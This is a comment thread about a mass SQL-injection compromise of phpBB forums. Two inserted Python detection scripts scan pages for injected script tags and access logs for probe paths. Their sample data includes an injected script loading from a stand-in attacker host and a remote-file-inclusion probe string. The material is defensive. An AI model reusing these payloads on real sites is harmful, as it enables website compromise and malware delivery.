Mass Website Hack Compromises 200,000 Sites
Stony Stevenson writes "Hot on the heels of a recent hack in which 10,000 sites were compromised, researchers have disclosed a new large-scale attack. Researchers at McAfee estimated that the attack has been active for roughly one week, and in that time frame has managed to place itself on roughly 200,000 web pages. Most of the infected pages are running the phpBB forum software, said McAfee. The compromised pages are embedded with a Javascript file that links to the site hosting the attack."
Yeah, I installed it way back in the days and forgot it was on my website. I have now gotten several emails from my domain host stating attacks on it using an exploit in phpBB.
Back in the later months of 2001 we experienced a gradual realization that there was something quite amiss about our government's response to terrorist threats which resulted in the disaster of September of that year. It turns out that not only did we know that there would be a terrorist attack, but we had credible leads indicating who and how it would be carried out. But the lack of information sharing led to disaster.
Here too, we have a threat which is already running wild. Thousands of websites are being attacked. Unfortunately, this article, like many which abound in the security theatre online media, is long on consequences and short on details. Someone knows how the attack spreads, but they aren't sharing the means of stopping the attack.
This article and its lack of content does as much to spread fear and chaos among computer users as the actual attack. These are technical problems which can be fixed. By not being clear about the threat, the article turns hackers into bogeymen that can't be stopped. Give some better info, tell us how to close the hole, and let us get back to work.
We don't run phpBB. Is it just me, or is phpBB almost always the target of these kinds of attacks? I mean, there are probably hundreds of CMS systems out there, but almost every mass site hijacking/defacement I can remember has involved phpBB.
Am I completely off-base here?
Why can't I mod "-1 Idiot"?
My old phpBB forum got hacked. Wanna know why? Cuz I used the auto-installing plugin that my host provided. It was about 20 versions behind and they NEVER updated it. So it had a gaping security hole in it. And guess what else! I couldn't patch it because it was considered some sort of embedded plugin that I couldn't touch the system files of. I had to install a fresh, updated version of phpBB and then copy the database over AND alter the database manually to reflect all the changes between versions, which was a major pain in the ass. Needless to say I was pissed. Oh and I tried to sue/have arrested those Zone-H assholes that posted it like it was some sort of trophy case but apparently they're not hosted in the US so I dropped it. I would be willing to guess that every single hack was because of outdated phpBB quick installs like ipowerweb makes available on their servers.
Google's Super Secret Search Algorithm: SELECT @search_results FROM internet WHERE @search_results = 'good'
It's a good think slashdot is immu PENI5 PILLS FREE WITH DISCOUNT MORT6A6ES! PENISFREE@OFFER.COM NOW!
Table-ized A.I.
Does a light bulb dim in the minds of some computer users at the prospect of free pornography? It is the easiest thing in the world to get free porn online, why is installing something on your computer from a porn website all of a sudden appealing when a pop up window seduces you into it? I have a new term for this, it is called getting "FreePwned."
I read both those articles and got the impression that the attack was 'social engineering' meaning that phpBB's only role was to allow someone to post a URL to a site which actually hacked the stupid victims. There is no specific mention of any exploit.
There *is* a mention of an exploit on ASP machines.
I'm a little confused here - how can it be "social engineering" when the javascript required to create the porn/codec popup had to be inserted somehow?
Which is why you're supposed to upgrade. The article is incredibly short and doesn't specify, but I'd be willing to bet the exploit was one that has already been patched/revealed.
At least with this attack the computer savvy not running NoScript or the like will be able to avoid getting hit with the payload. And now, time to check to make sure my ASP pages haven't been attacked...
This IS Slashdot, right? Or have I been posting to the NSA all this time?
Hi mom!
What?
If that happens, certifications will likely be available for commercial OSes only - e.g. M$, Solaris, Novell, Redhat, OSX.
200,000 web pages is not the same thing as 200,000 web sites.
My hovercraft is full of eels.
yes, I was wondering the same. suppose one had a site with phpbb installed and wanted to check if their site was one of those compromised. how would one go about that? tfa doesn't mention. it seems somehow half-assed to publish that several tens of thousands of sites have been compromised, yet not provide any useful information regarding detection, cleaning and prevention.
The title (which appears to be the only part the submitter actually "authored") is incorrect and conflicts with the text it quotes. An estimated 200,000 pages (most likely individual posts in phpBB forums) are out there, not sites.
According to this video, the pages are being inserted via SQL injection attacks. The 200k pages is based on a google search (he does not reveal what criteria he is searching for) which came back with 150k hits. So it is not clear how many actual sites are compromised. One could assume that once a phpBB site is compromised, every page of every thread, which is analogous to individual web pages, would redirect to the worm download site. A popular forum could easily have several thousand thread-pages. In fact, every single page would probably be redirecting, which would include each user's summary page (which would be in the thousands for even a small site). So a small number of sites could be accounting for all the 200k pages.
Also, in the video it is clear from the url that it is a phpBB2 site that is compromised. phpBB is currently at a major version of 3.
Better known as 318230.
But I've made some modifications to my install. I replaced the registration and profile pages with a web form that posts to an Email parser. There was a lot of activity the last few days, spam registrations out the yang.
It's funny because to them it looks like the registration page and they keep running scripts against it. I block the IP ranges of the spam registrations at the boundary but they just keep block hopping.
They'll still get a script reg through sometimes, so there's something I'm missing. I could just install the security updates but it's so much more fun to try and tweak it myself.
That's our life, the big wheel of shit. - The Fat Man, Blue Tango Salvage
And nothing of value was lost.
Tell him to set up power saving correctly. Although my computer needs to stay connected to the mains for suspend to ram to work. It's to most intensive purposes "turned off". Takes 7 seconds (at most) to go to sleep and a few seconds wake up and I never have a problem.
At least I think that's what it does - I've never actually used it, as the cable modem is outside my hardware firewall anyway.
The attack probably targeted phpBB2. Get the latest phpBB version which at this moment is 3.0.0.
Most of us can say phpBB or even the 1000s of php based 'pre-packaged' web sites out there are disasters waiting to happen. Either being poorly coded, not keeping up to date with the latest patches or able to use the current secure versions of PHP, etc.
The problem here is most of the people using this software have limited HTML/Web programming skills and find these as easy solutions to what they want, a site for their MMO Clan, their band, etc.
These packages are not only presented as free and easy, but safe because they are built on non-MS technologies, which is where the anti-MS FUD actually hurts the Web and consumers.
In contrast, if these projects were built on ASP for pre-processing instead of PHP, they wouldn't break with each security update as often happens in PHP land, and unlike PHP, ASP stays updated and has proven to be highly secure. The kicker with mainstream ASP is it requires an IIS server and Windows server is not always cheap or the cheapest hosting solution for these same users.
I am hoping that MS's interest in helping PHP to play nice with Windows 2008 IIS even better, that as MS is able to quality check PHP code used through IIS, that MS's automation security investments will pay back to even the PHP world, as potential security risks would be something that is now also in Microsoft's interest to publish back to the PHP group.
I know this isn't saying PHP is inherently insecure, we are talking about phpBB and similar products, but if they can get into a cycle of consistent security minded models and staying current with PHP updates without having to worry about applications breaking it will make a big difference.
Developing for PHP and/or working with pre-built PHP applications, I have watched developers spend the majority of their time working around bugs in the applications or in PHP itself. Whereas for an ASP developer there are very few known problems that have to be coded around, and they also don't have the hours of ensuring version matching to make the application work like you end up doing with PHP pre-built apps.
This is one area where ASP gets a nod, as keeping the versions up to date is seamless, and applications and sites designed around ASP simply don't break even with the most massive updates.
Don't, like, trust anyone with a UID shorter than 6 digits, man...
This is the kind of thing that really upsets me. I mean, if someone has the 1337z sk1llz to do this sort of thing, why aren't they using those skills to make a fortune, instead of using them to fsck up other peoples' websites? that sort of behavior ain't cool. in fact, it's decidedly uncool and people who act that way should be banished to a big island for criminals, like Australia.
You can disable the connection to the internet in your modem's driver options (or ethernet port's driver's options...) or your computer's network settings. Leaving a link to the settings on your desktop ensures you won't forget to turn it back on when you come back to your computer after going out to do whatever the hell anyone would do without a computer (buy a new monitor?).
Mind you it does take all of 20 seconds to have your network grab you an IP address...verify your computer...and finally connect. But I'm sure there's something you can do during that time (boot up your MP3 player...etc...).
Ginga no Rekshiya Mata Each page.
Buy a cheap $40 home router box.
My hovercraft is full of eels. All your base are belong to us. And he had made a trumpet of his ass.
Most if not all cable modems have a standby button on it to literally "turn off the internet".
It's usually located on the top, if it's a Motorola.
"We need to get over this notion, that, for Apple to win... Microsoft must lose." - Steve Jobs, 1997
When this news broke last night (my local time), my heart skipped a beat because one of my phpBB instances isn't totally up to date, so I did a quick bit of research to see if I could fill in the massive blanks left by this report. Yes, it does look like an SQL injection attack: the attack appends a SCRIPT tag to the forum's main title, which is inserted into various locations on every page from a database field. Due to one thing and another this results in some hideously malformed HTML, but it has the desired effect (of executing the Javascript) in the major browsers. I suspect that the search in question is a Google "intitle:" search which keys off the domain name of the site carrying the exploit code, since this becomes a visible part of the title.
I have no idea exactly how the SQL injection is being effected, but my phpBB forum was not impacted. This may be because my version is not too old, because I lack a vulnerable add-on module, or because my custom anti-bot mechanisms deflected the attack. I couldn't see anything in the past few days of log activity which contained key strings used in the exploit, but I didn't search very hard once I determined that my instance was unaffected.
proof, n. A demonstration that a conclusion is implied by certain premises and axioms.
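The post above describes the compromise as a SCRIPT tag appended to the forum title, which is then rendered into the title and header of every page. An added example (not from the post, not phpBB project code) of a defender-side check for that symptom: one function inspects the raw title value as it would be read from the forum's configuration storage, and a small HTML scanner flags any script tag that appears inside the title element or loads from a host other than the forum's own. The two sample pages, the host names and the allowlist are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a page as it might render after the forum title field has
# had a script tag appended (the title is reused in <title> and the page header).
COMPROMISED_PAGE = """<html><head><title>My Forum<script src="http://attacker.invalid/b.js"></script> :: Index</title></head>
<body><h1>My Forum<script src="http://attacker.invalid/b.js"></script></h1></body></html>"""

# Constructed sample: an untouched page that legitimately loads a local script.
CLEAN_PAGE = """<html><head><title>My Forum :: Index</title></head>
<body><h1>My Forum</h1><script src="/templates/forum.js"></script></body></html>"""

SITE_HOST = "forum.example.org"  # constructed: the forum's own host name

SCRIPT_TAG_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def title_value_is_clean(sitename):
    """Check the raw forum-title value (as stored in the forum config) for a script tag.

    A forum title never legitimately contains markup, so any <script> here is a finding.
    """
    return SCRIPT_TAG_RE.search(sitename) is None


class InjectedScriptScanner(HTMLParser):
    """Flag script tags inside <title> and script sources on non-allowlisted hosts."""

    def __init__(self, site_host, allowed_hosts=()):
        super().__init__()
        self.allowed = set(allowed_hosts) | {site_host}
        self.in_title = False
        self.findings = []  # list of (indicator, detail) tuples

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self.in_title = True
        elif tag == "script":
            src = dict(attrs).get("src")
            if self.in_title:
                # html.parser does not treat <title> as raw text, so an injected
                # tag inside it is seen as a real start tag here.
                self.findings.append(("script_in_title", src))
            if src:
                host = urlparse(src).hostname  # None for relative URLs such as /templates/forum.js
                if host and host not in self.allowed:
                    self.findings.append(("external_script", host))

    def handle_endtag(self, tag):
        if tag == "title":
            self.in_title = False


def scan_page(html, site_host, allowed_hosts=()):
    """Return the list of findings for one rendered page; an empty list means nothing suspicious."""
    scanner = InjectedScriptScanner(site_host, allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    print("clean title value:", title_value_is_clean("My Forum"))
    print("tampered title value:", title_value_is_clean('My Forum<script src="http://attacker.invalid/b.js"></script>'))
    for name, page in (("clean", CLEAN_PAGE), ("compromised", COMPROMISED_PAGE)):
        print(name, scan_page(page, SITE_HOST))
```

Checking the stored title value directly is the more reliable of the two, since the rendered HTML is, as the post notes, badly malformed and may confuse a parser; the page scanner is useful when you only have fetched copies of the pages.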
It's to most intensive purposes "turned off". How about for purposes which are a bit less intensive?
Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
Granted PHPBB was hacked because it's poorly written and these sites were likely not kept up to date, but... these kinds of successful large-scale attacks really don't do much to show how much more secure open source software is - even very popular FOSS like this!
Yeah yeah, I know I'll be marked as troll/flamebait or whatever... but I don't see any upmodded discussion of this, it's a serious issue, if only for the perception it fosters in the industry.
Come on, this guy was right. the phpBB vulnerability has nothing to do with 9/11, and certainly nothing to do with blaming the government for 9/11.
Do you want more posts that start like this, "This reminds me of George Bush's environmental policy..."
Moderation is supposed to stop that sort of thing. Instead he's +5.
Those are my principles. If you don't like them I have others. -Groucho Marx
And then, you read the top of the report and discover that all this is old news, that you've been only reading spam for the last two years.
For a second, you think that humanity may not be the mass of morons you thought. That patching the bug will let you access the real, intelligent, acute comments of human forums.
Then, as the patch starts to work, you see those comments; the beauty of human forums brings a tear to your eye. As you start posting, you feel unable to write, your keyboard doesn't seem to work.
You then understand you were just another spam generator, and the patch is killing you.
Fade to black.
Mind you it does take all of 20 seconds to have your network grab you an IP address...verify your computer...and finally connect.
20 seconds?!? Who's got that kind of time? I'll be old by then!
"Every great cause begins as a movement, becomes a business, and eventually degenerates into a racket." -- Eric Hoffer
And Ham Radio operators should know Morse Code. .-.. --- .-..
No, that's why you're not supposed to use software which is so full of holes that the only way to keep it safe is to continuously upgrade as the problems are discovered one after another.
I noticed a sudden spike in traffic last week on one of my customer's hosted sites that ran phpBB. Sure enough they were allowing self-registration and things got worse from there. I killed the threads, users, and checked the server logs and sure enough there were some nasty processes that got left behind. After we killed them too and disabled auto-logins things went back to normal. This happened because I had recently upgraded to a stand-alone server, and the software that normally rejects automated probes for known exploits wasn't running correctly. As so many of you have said, this is a technical problem that can easily be defended against. The nature of open source software means that the code is available for scrutiny and exploit, and the side effects are a part of the 'maturing' process of such free tools.
Looking through my 404 logs I get a bunch of kiddie auto scripts either looking to BB spam or hack in, here are some items which I figure are popular entry routes:
///include/print_category.php
/forum/index.php
/bbs/include/print_category.php
/functions.php
/board/index.php
/forums/index.php
/phpbb2/index.php
//calendar//tools/send_reminders.php
//skin/zero_vote/error.php (lots of these)
/skin/zero_vote/ask_password.php
//support/mailling/maillist/inc/initdb.php (a few of these)
/function.main
/comments.php
/MSOffice/cltreq.asp
/cgi-bin/bbs/read.cgi
//include/write.php
"Enjoy what you're doing! If it becomes drudgery, you're doing it wrong!" - Jim Butterfield
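An added example (not from the post above) of turning that list of 404 hits into a log check: it parses combined-format access log lines, normalizes the doubled slashes seen in the post's entries, and reports per client IP any 404 request to one of the listed paths, plus any request whose query string passes a remote URL as a parameter value (the classic remote-file-inclusion probe shape). Only 404s count for the path indicator, because on a site that really runs a forum a path such as /forum/index.php is legitimate traffic. The log lines and IP addresses are constructed for the example.

```python
import re
from collections import defaultdict

# Paths from the post's 404 list, with leading slashes normalized to one.
PROBE_PATHS = {
    "/include/print_category.php",
    "/forum/index.php",
    "/bbs/include/print_category.php",
    "/functions.php",
    "/board/index.php",
    "/forums/index.php",
    "/phpbb2/index.php",
    "/calendar/tools/send_reminders.php",
    "/skin/zero_vote/error.php",
    "/skin/zero_vote/ask_password.php",
    "/support/mailling/maillist/inc/initdb.php",
    "/function.main",
    "/comments.php",
    "/MSOffice/cltreq.asp",
    "/cgi-bin/bbs/read.cgi",
    "/include/write.php",
}

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log: one scanner walking the list, one normal visitor, one single probe.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2008:03:14:01 +0000] "GET //skin/zero_vote/error.php HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Jan/2008:03:14:02 +0000] "GET /skin/zero_vote/ask_password.php HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Jan/2008:03:14:03 +0000] "GET //include/write.php?dir=http://example.invalid/x.txt? HTTP/1.1" 404 512 "-" "Mozilla/4.0"
198.51.100.23 - - [10/Jan/2008:03:20:11 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Jan/2008:03:20:12 +0000] "GET /forum/index.php HTTP/1.1" 200 6011 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Jan/2008:04:01:00 +0000] "GET /forums/index.php HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
"""


def classify_request(target, status):
    """Return the indicator names that apply to one request target (path plus query)."""
    path, _, query = target.partition("?")
    path = re.sub(r"/+", "/", path)  # collapse // and /// as seen in the post's list
    indicators = []
    if status == "404" and path in PROBE_PATHS:
        indicators.append("known_probe_path")
    if re.search(r"=\s*https?://", query, re.IGNORECASE):
        indicators.append("remote_url_in_query")
    return indicators


def scan_log(log_text):
    """Map each client IP with at least one suspicious request to its list of (target, indicators)."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        indicators = classify_request(m.group("target"), m.group("status"))
        if indicators:
            hits[m.group("ip")].append((m.group("target"), tuple(indicators)))
    return dict(hits)


if __name__ == "__main__":
    for ip, requests in scan_log(SAMPLE_LOG).items():
        print(ip, len(requests), "suspicious request(s)")
        for target, indicators in requests:
            print("   ", target, ", ".join(indicators))
```

Feed it the real access log rather than only the 404 log and the second indicator will also surface probes that happened to hit an existing script, which is where a successful attempt would show up.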
Although the other guy's comment was much funnier, it probably is worth me pointing out the expression is "all intents and purposes" not "all intensive purposes". Still; better you make the mistake and get corrected online than in the boardroom ;-)
Great. If mods and add-ons could be more seamlessly added, that'd be great. But upgrading your phpBB when it has a half dozen mods and modifications twisted into the code is daunting at best.
The Fully Modded phpBB website is down, but it is basically a fork or extension of the base phpBB code, which remains secure.
I know I've labored the point about phpBB not being vulnerable to this kind of attack, but it really is built from the ground up for security. This exploit does not affect phpBB, just the heavily modified fork "Fully Modded phpBB".
Damn, I already moderated this topic. Now I'll have to log in with my sock puppet to comment.
No, it would be people, who would be licensed, not the operating systems (which are hard to define anyway: Linux vs. Ubuntu?)
Much like plumbers and electricians...
In Soviet Washington the swamp drains you.
I'd tend to agree, actually. But, I think, it is inconsistent to require licensing for driving a car and not require it for an Internet connection. There will soon be a time when a hacker will be responsible for a death, if it has not happened already...
A botnet targeting a 911 server or a utility company, or a swatting gone really wrong...
In many cases, the hackers are using other people's PCs without their knowledge — a clueless person making their PC reachable from the Internet is about as dangerous as an unlicensed driver on the highway...
In Soviet Washington the swamp drains you.
Licensing people would bring its own can of worms. First, unless one handed out smartcards and passed legislation to have CAC or a similar smart card reader on every desktop and laptop, it would give identity thieves another easy target because most likely it would be implemented by requiring people to punch in an "Internet license number" for access to websites, similar to how Korea requires your residence registration number if you want to create an account on a website there. Of course, this info is easily obtained from compromised sites, sniffers, or keyloggers.
This would allow someone you wouldn't want, be it your opposition in a civil lawsuit, some stalking ex or whatnot to find every single post you have done in your life on every single website with a query, just matching your Internet ID number. I would bet that a lot of school districts would have regular searches on student Internet ID numbers to monitor what they posted, and perhaps expel them if they posted something that wasn't accepted, such as Mrs. Crabtree being a hard grader.
There are tradeoffs; I'll take the botnets over having to leave a permanent bread crumb trail of my real life information anywhere I go. At least with IP addresses, it requires a court order for ISPs to turn over username info in most cases.
I am so lucky, because I upgraded my forum from phpbb2 to phpbb3 in time. I think that phpbb2 is not well written, but it is the best free (and open source) forum cms I know. I hope phpbb3 will be better than its father. The important thing is to update immediately when a security upgrade is released. That is my opinion.
No, you completely misread my proposal. I don't know how to express it any clearer, so I'll just try again, with emphasis:
There. Accessing web-sites is Ok. But if you want your ISP to allow any connection initiated from the outside to reach your computer, a person licensed in Internet security (yourself or someone you hired) needs to vouch for your computer's health.
This will not stop malware distributed by e-mail, but it will cut down on the compromised web-sites — the subject of TFA.
A successful hack into your system ought also to make you financially liable to those who your system was used against. Insurance may be available for that, with their rates being a reflection of your preparedness and history.
Very similar to how driving is handled, actually...
In Soviet Washington the swamp drains you.
In many cases, the hackers are using other people's PCs without their knowledge -- a clueless person making their PC reachable from the Internet is about as dangerous as an unlicensed driver on the highway...
Please post even a single reference to an actual death or injury that could have been prevented by licensing internet access.
What we need to do is spend less money confiscating water bottles and more detecting and prosecuting people exploiting PCs.
Yeah, that'll be great! The license fees and insurance costs will inch up until only a corporate sponsored person can afford it and web 2.0 can become boob-tube 2.0
The telecom and media industries LOVE barriers to entry because they can lobby to raise them just high enough to keep potential competition away.
No, it's not, although the difference is subtle. The original comment is referring to the fact that different government agencies had information and leads, prior to 9/11, about the attacks. It was known that there were people with no flight experience paying thousands of dollars to learn to fly commercial jets, and that these people weren't interested in learning how to take off or land. This aroused some suspicions but it wasn't followed up. There was the 20th hijacker who didn't participate in the attacks because he was in jail. But these (and other) leads were never followed up on. This doesn't mean "the government/George Bush knew about 9/11 and stood down". It means "the federal government is really big and the different agencies don't talk to each other." This is the analogy that the original commenter is trying to make: better discussion of security vulnerabilities would make it easier to fight those vulnerabilities. The original commenter never said the US government carried out 9/11 or knew ahead of time that it would happen.
Remember the days when Republicans were the party of fiscal responsibility?
Does *anyone* know how to detect this exploit in your PHPBB install?
I've been getting auto-scripts lately on my Linux web server that are trying to exploit a file called xmlrpc.php...
I love PHPBB, but I am truly disappointed with both responses I've seen from the phpBB guys. It's really a shame.
Yeah, it really sucks that regular people can not drive their own cars any more, and are forced to take big corporation-owned buses, doesn't it?
In Soviet Washington the swamp drains you.
They tend to be based abroad, and the CIA's drones can only blast so many per month...
In Soviet Washington the swamp drains you.
So... you're not supposed to use software that has patches released? And/or you're expecting someone to anticipate all forms of attack when writing a program? That seems unreasonable to me. And, why not release a patch once a problem has been discovered? Don't you want your programs to get upgraded when needed?
They tend to be based abroad, and the CIA's drones can only blast so many per month...
A "please secure your %*^%*& server" from the FBI might get some action on the U.S. side without nearly the overhead of licensing.
Yeah, it really sucks that regular people can not drive their own cars any more, and are forced to take big corporation-owned buses, doesn't it?
If the bus and taxi lobby were as big as telecom, that would be exactly the case. Also keep in mind that there are way too many registered voters who want to drive but not so many that want to run a server.
I'd appreciate it if you replied to the things I actually said. By doing so, I would actually be able to answer you.